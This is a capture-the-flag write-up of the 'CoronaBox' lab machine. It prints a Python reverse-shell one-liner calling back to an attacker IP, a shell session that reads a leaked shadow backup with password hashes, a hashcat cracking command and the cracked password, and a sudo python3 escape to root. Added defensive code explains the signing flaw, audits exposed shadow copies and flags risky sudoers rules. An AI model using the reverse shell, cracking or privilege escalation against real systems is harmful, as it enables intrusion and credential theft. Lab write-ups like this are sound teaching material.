CTF ESAIP 2021 — Box Write-up: CoronaBox


CoronaBox

The Corovid web application
Example of a request sent to refresh the displayed counter
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.255.6",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Using CyberChef for the encoding
Using the browser's JavaScript console to modify the command that is about to be signed
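The two captions above describe the weak point of the Corovid app: the refresh request carries a command together with a signature that the browser itself computes, so whoever controls the page can sign whatever command they like. The following is an added illustration, not the Corovid source: a minimal HMAC-signed request handler in its vulnerable shape (key shipped to the frontend, command string chosen by the client) next to a hardened shape (client only names an action, the server owns the key and the mapping to a fixed argv). All keys, action names and the `corovid-count` helper path are constructed placeholders.

```python
import hashlib
import hmac
from typing import List, Optional

# Constructed illustration, not the CoronaBox application's source. The
# write-up shows the refresh request carrying a command plus a signature that
# the browser computes, so the signing key lives in the frontend and any
# client can sign any command. The fix is for the server to own both the key
# and the mapping from request to command, and never to run a client string.


def sign(key: bytes, message: str) -> str:
    return hmac.new(key, message.encode(), hashlib.sha256).hexdigest()


def verify(key: bytes, message: str, signature: str) -> bool:
    return hmac.compare_digest(sign(key, message), signature)


# --- vulnerable design: key shipped to the browser, command chosen by the client
FRONTEND_KEY = b"constructed-key-visible-in-app.js"   # assumption: readable by every visitor


def plan_vulnerable(cmd: str, signature: str) -> Optional[List[str]]:
    """argv the vulnerable server would hand to a shell, or None if rejected.

    The signature check passes for every command the client signs with the
    frontend key, so it provides no integrity guarantee at all."""
    if not verify(FRONTEND_KEY, cmd, signature):
        return None
    return ["/bin/sh", "-c", cmd]


# --- hardened design: the client only names an action; the server holds the key
SERVER_KEY = b"constructed-key-that-never-leaves-the-server"
ACTIONS = {
    # hypothetical helper binary that prints the counter; fixed argv, no shell
    "refresh_count": ["/usr/local/bin/corovid-count"],
}


def issue_token(action: str) -> str:
    """Server side: the token is rendered into the page so the client can echo it back."""
    if action not in ACTIONS:
        raise KeyError(action)
    return sign(SERVER_KEY, action)


def plan_hardened(action: str, token: str) -> Optional[List[str]]:
    """Only a server-issued token for a known action yields an argv to execute."""
    if action not in ACTIONS or not verify(SERVER_KEY, action, token):
        return None
    return list(ACTIONS[action])


if __name__ == "__main__":
    print(plan_vulnerable("corovid-count; other-command",
                          sign(FRONTEND_KEY, "corovid-count; other-command")))
    print(plan_hardened("refresh_count", issue_token("refresh_count")))
    print(plan_hardened("other-command", sign(FRONTEND_KEY, "other-command")))
```

The point of the comparison is that the signature only ever proves "someone with the key produced this string"; when the key is in the browser, that someone is the attacker. Keeping the key on the server and refusing free-form command strings removes the injection rather than trying to sign it away.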
Connection from 192.168.99.100:59360 
/bin/sh: 0: can't access tty; job control turned off
$ whoami
pfizer
python3 -c 'import pty; pty.spawn("/bin/sh")'
root:x:0:0:root:/root:/bin/bash
pfizer:x:1000:1000::/home/pfizer:/bin/sh
astrazeneca:x:1001:1001::/home/astrazeneca:/bin/sh
$ ls -al /srv 
ls -al /srv
total 12
drwxr-xr-x 1 root root 4096 May 29 17:29 .
drwxr-xr-x 1 root root 4096 May 23 21:48 ..
-rw-r--r-- 1 root pfizer 577 May 29 17:29 .bckp_2021-05-23_21:01.zip
$ cp /srv/.bckp_2021-05-23_21:01.zip /tmp
cp /srv/.bckp_2021-05-23_21:01.zip /tmp
$ unzip .bckp_2021-05-23_21:01.zip
unzip .bckp_2021-05-23_21:01.zip
Archive: .bckp_2021-05-23_21:01.zip
inflating: etc/shadow
$ ls -al
ls -al
total 24
drwxrwxrwt 1 root root 4096 May 29 17:30 .
drwxr-xr-x 1 root root 4096 May 23 21:48 ..
-rw-r--r-- 1 pfizer pfizer 577 May 29 17:29 .bckp_2021-05-23_21:01.zip
-rw-r--r-- 1 root root 12 May 29 17:30 .corovid_value.txt
drwxrwxr-x 2 pfizer pfizer 4096 May 29 17:30 etc
$ ls -al etc
ls -al etc
total 16
drwxrwxr-x 2 pfizer pfizer 4096 May 29 17:30 .
drwxrwxrwt 1 root root 4096 May 29 17:31 ..
-rw-r----- 1 pfizer pfizer 877 May 23 21:01 shadow
$ cat etc/shadow
cat etc/shadow
root:$6$qKTqZ3FAFP0HINUH$iIQtzV/KeP5vC12qQamP4hJ0EIm9jFIT4fJy8pjtOitMaJHWb8vNoFJLbyI8ObKvRUwVx/qSYqr47wKV6tsct0:18770:0:99999:7:::
daemon:*:18733:0:99999:7:::
bin:*:18733:0:99999:7:::
sys:*:18733:0:99999:7:::
sync:*:18733:0:99999:7:::
games:*:18733:0:99999:7:::
man:*:18733:0:99999:7:::
lp:*:18733:0:99999:7:::
mail:*:18733:0:99999:7:::
news:*:18733:0:99999:7:::
uucp:*:18733:0:99999:7:::
proxy:*:18733:0:99999:7:::
www-data:*:18733:0:99999:7:::
backup:*:18733:0:99999:7:::
list:*:18733:0:99999:7:::
irc:*:18733:0:99999:7:::
gnats:*:18733:0:99999:7:::
nobody:*:18733:0:99999:7:::
_apt:*:18733:0:99999:7:::
pfizer:$6$VjeJbF1j0r5HZyuD$4W7rRIHjbMJmMnvpUeHp4nsJl1XzmNRTZH9iNssJOlHw617sytbqajqyj8f0IpItYebpIHWa0MoAOBdBfErpZ/:18770:0:99999:7:::
astrazeneca:$6$4zZ92IsZJlH8WBNH$m2rFyDaihM7U.M4Lb1abZwt1i4dXRsM2IWE4TxPu4y1qRKxHunntwXgYrP4hlllhd7.yjK1LD58sWXEJpasNK.:18770:0:99999:7:::
pfizer:$6$VjeJbF1j0r5HZyuD$4W7rRIHjbMJmMnvpUeHp4nsJl1XzmNRTZH9iNssJOlHw617sytbqajqyj8f0IpItYebpIHWa0MoAOBdBfErpZ/
astrazeneca:$6$4zZ92IsZJlH8WBNH$m2rFyDaihM7U.M4Lb1abZwt1i4dXRsM2IWE4TxPu4y1qRKxHunntwXgYrP4hlllhd7.yjK1LD58sWXEJpasNK.
root:$6$qKTqZ3FAFP0HINUH$iIQtzV/KeP5vC12qQamP4hJ0EIm9jFIT4fJy8pjtOitMaJHWb8vNoFJLbyI8ObKvRUwVx/qSYqr47wKV6tsct0
hashcat -m 1800 -a 0 ./hashes ./rockyou.txt -O
$6$4zZ92IsZJlH8WBNH$m2rFyDaihM7U.M4Lb1abZwt1i4dXRsM2IWE4TxPu4y1qRKxHunntwXgYrP4hlllhd7.yjK1LD58sWXEJpasNK.:monsauveur
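Everything from the `/srv` listing to the hashcat result above hinges on one file: a backup of `etc/shadow` zipped into `/srv` with mode 0644 and group `pfizer`, readable by the low-privilege account the reverse shell landed in. The following is an added audit script, not the write-up author's tooling, that walks a directory tree and reports copies of the shadow file that other local users can read, whether as plain files or as members of zip archives. The directory layout, file modes and hash lines it builds for its demo are constructed fixtures; the `trusted_gids` parameter stands in for the `shadow` group that legitimately may read the real file.

```python
import os
import re
import stat
import tempfile
import zipfile
from typing import Dict, List, Tuple

# Added example, not the write-up author's code: find copies of /etc/shadow
# that other local users can read, as plain files or inside zip backups. On
# CoronaBox, /srv/.bckp_...zip was mode 0644, group pfizer, and held etc/shadow.

# One crypt(3)-style hash field after the account name ($1$, $5$, $6$, $y$, $2b$ ...).
SHADOW_LINE = re.compile(r"^[a-z_][a-z0-9_-]*:\$(?:1|5|6|y|2[aby]?)\$[^:]*:", re.M)
SHADOW_NAMES = {"shadow", "shadow-", "gshadow", "gshadow-"}


def looks_like_shadow(data: bytes) -> bool:
    return SHADOW_LINE.search(data.decode("utf-8", errors="replace")) is not None


def is_exposed(path: str, trusted_gids: Tuple[int, ...]) -> bool:
    """Readable by 'other', or by a group that is not in the trusted set."""
    st = os.stat(path)
    if st.st_mode & stat.S_IROTH:
        return True
    return bool(st.st_mode & stat.S_IRGRP) and st.st_gid not in trusted_gids


def archive_shadow_members(path: str) -> List[str]:
    """Zip members named like a shadow file, or small members whose content looks like one."""
    if not zipfile.is_zipfile(path):
        return []
    hits = []
    with zipfile.ZipFile(path) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if os.path.basename(info.filename) in SHADOW_NAMES:
                hits.append(info.filename)
            elif info.file_size <= 1_000_000 and looks_like_shadow(zf.read(info)):
                hits.append(info.filename)   # renamed copy, caught by content
    return hits


def find_exposed_shadow_copies(root: str, trusted_gids: Tuple[int, ...] = ()) -> List[Tuple[str, str]]:
    findings: List[Tuple[str, str]] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not is_exposed(path, trusted_gids):
                continue
            members = archive_shadow_members(path)
            if members:
                findings.extend((path, "zip member " + m) for m in members)
            elif not zipfile.is_zipfile(path):
                with open(path, "rb") as fh:
                    if looks_like_shadow(fh.read(65536)):
                        findings.append((path, "plaintext shadow content"))
    return sorted(findings)


def build_sample_tree(base: str) -> None:
    """Constructed fixture mirroring the box: a world-readable zip backup, a
    group-readable plain copy, a private copy and an unrelated file."""
    sample = b"root:$6$constructedsalt$constructedhashvalue:18770:0:99999:7:::\n"
    os.makedirs(os.path.join(base, "srv"))
    os.makedirs(os.path.join(base, "etc"))
    zpath = os.path.join(base, "srv", ".bckp.zip")
    with zipfile.ZipFile(zpath, "w") as zf:
        zf.writestr("etc/shadow", sample)
    os.chmod(zpath, 0o644)
    for rel, mode, data in (("etc/shadow", 0o640, sample),
                            ("etc/shadow_private", 0o600, sample),
                            ("README", 0o644, b"nothing sensitive here\n")):
        p = os.path.join(base, rel)
        with open(p, "wb") as fh:
            fh.write(data)
        os.chmod(p, mode)


def run_demo() -> Dict[str, List[Tuple[str, str]]]:
    """Scan the fixture twice: with no trusted group, then trusting the group
    that owns the plain copy (playing the role of the real 'shadow' group)."""
    base = tempfile.mkdtemp(prefix="shadow-audit-")
    build_sample_tree(base)
    shadow_gid = os.stat(os.path.join(base, "etc", "shadow")).st_gid

    def rel(rows):
        return [(os.path.relpath(p, base).replace(os.sep, "/"), why) for p, why in rows]

    return {
        "default": rel(find_exposed_shadow_copies(base)),
        "trusted_group": rel(find_exposed_shadow_copies(base, trusted_gids=(shadow_gid,))),
    }


if __name__ == "__main__":
    for scope, rows in run_demo().items():
        print(scope, rows)
```

The content check matters as much as the name check: a backup job that renames or re-packs the file still leaves the `$6$` hash fields in place, and those fields are what an offline cracker needs. Backups of `/etc/shadow` belong under 0600 root-owned paths, not in a service directory with a service group.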
$ su astrazeneca
su astrazeneca
Password: monsauveur
$ sudo -l
sudo -l
Matching Defaults entries for astrazeneca on 1a37df71d186:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User astrazeneca may run the following commands on 1a37df71d186:
(ALL : ALL) NOPASSWD: /usr/bin/python3
$ sudo python3 -c 'import os; os.system("/bin/sh")'
sudo python3 -c 'import os; os.system("/bin/sh")'
# whoami
whoami
root
# cat /root/flag.txt
cat /root/flag.txt
CTF{V@cc!nezVous@h@h}
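The last step needed nothing more than the `sudo -l` line `(ALL : ALL) NOPASSWD: /usr/bin/python3`: a rule that hands a user an interpreter as root hands them a root shell. The following is an added sudoers audit, not part of the original write-up, that parses user specifications from a sudoers file (the rule format, not the `sudo -l` output shown above), tracks `NOPASSWD`/`PASSWD` tags the way sudo does across a command list, and flags commands whose binary can drop to a shell. The sample sudoers it ships with is constructed; only the `astrazeneca` rule mirrors the box.

```python
import os
import re
from typing import List, NamedTuple

# Added example, not the write-up author's code: flag sudoers rules that let a
# user run a shell, interpreter, editor or pager as root, and whether they need
# a password. On CoronaBox "astrazeneca ALL=(ALL : ALL) NOPASSWD: /usr/bin/python3"
# was the entire path from the cracked account to root.

SHELL_CAPABLE = {
    "sh", "bash", "dash", "zsh",                        # shells
    "python", "python2", "python3", "perl", "ruby",     # interpreters
    "node", "php", "lua", "env",
    "vi", "vim", "nano", "less", "more", "man",         # editors and pagers with shell escapes
}


class Finding(NamedTuple):
    user: str
    runas: str
    command: str
    nopasswd: bool
    unrestricted_args: bool   # True when the rule fixes no arguments at all


# user  host = (runas) [TAG:] cmd, [TAG:] cmd ...
RULE = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$")
TAG = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|NOLOG_INPUT|LOG_OUTPUT|NOLOG_OUTPUT)\s*:\s*")
SKIP = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias", "@include", "@includedir")


def audit_sudoers(text: str) -> List[Finding]:
    findings: List[Finding] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith(SKIP):
            continue
        m = RULE.match(line)
        if not m:
            continue
        user = m.group("who")
        runas = (m.group("runas") or "root").replace(" ", "")
        nopasswd = False   # a tag persists across the command list until overridden
        for cmd in m.group("rest").split(","):
            cmd = cmd.strip()
            while True:
                t = TAG.match(cmd)
                if not t:
                    break
                if t.group(1) == "NOPASSWD":
                    nopasswd = True
                elif t.group(1) == "PASSWD":
                    nopasswd = False
                cmd = cmd[t.end():].strip()
            if not cmd or cmd.startswith("!"):
                continue
            if cmd == "ALL":
                if nopasswd:
                    findings.append(Finding(user, runas, cmd, True, True))
                continue
            parts = cmd.split()
            if os.path.basename(parts[0]) in SHELL_CAPABLE:
                findings.append(Finding(user, runas, cmd, nopasswd, len(parts) == 1))
    return findings


def high_risk(findings: List[Finding]) -> List[Finding]:
    """NOPASSWD plus free arguments: an interactive root shell is one command away."""
    return [f for f in findings if f.nopasswd and f.unrestricted_args]


# Constructed fixture; only the astrazeneca line reflects the box.
SAMPLE_SUDOERS = """\
# constructed sudoers fixture
Defaults env_reset, mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
astrazeneca ALL=(ALL : ALL) NOPASSWD: /usr/bin/python3
pfizer ALL=(root) /usr/bin/systemctl restart corovid, NOPASSWD: /usr/bin/python3 /opt/corovid/refresh.py
backupop ALL=(root) NOPASSWD: /usr/bin/rsync
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(("HIGH " if f in high_risk([f]) else "warn ") + f"{f.user} -> {f.runas}: {f.command}")
```

The `pfizer` rule shows the usual half-fix: pinning the interpreter to one script narrows the rule, but it is only as strong as the write permissions on that script and its imports. The clean remediation is a dedicated wrapper owned by root with no arguments, or dropping the rule altogether.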

Les Pires Hat (French CTF team)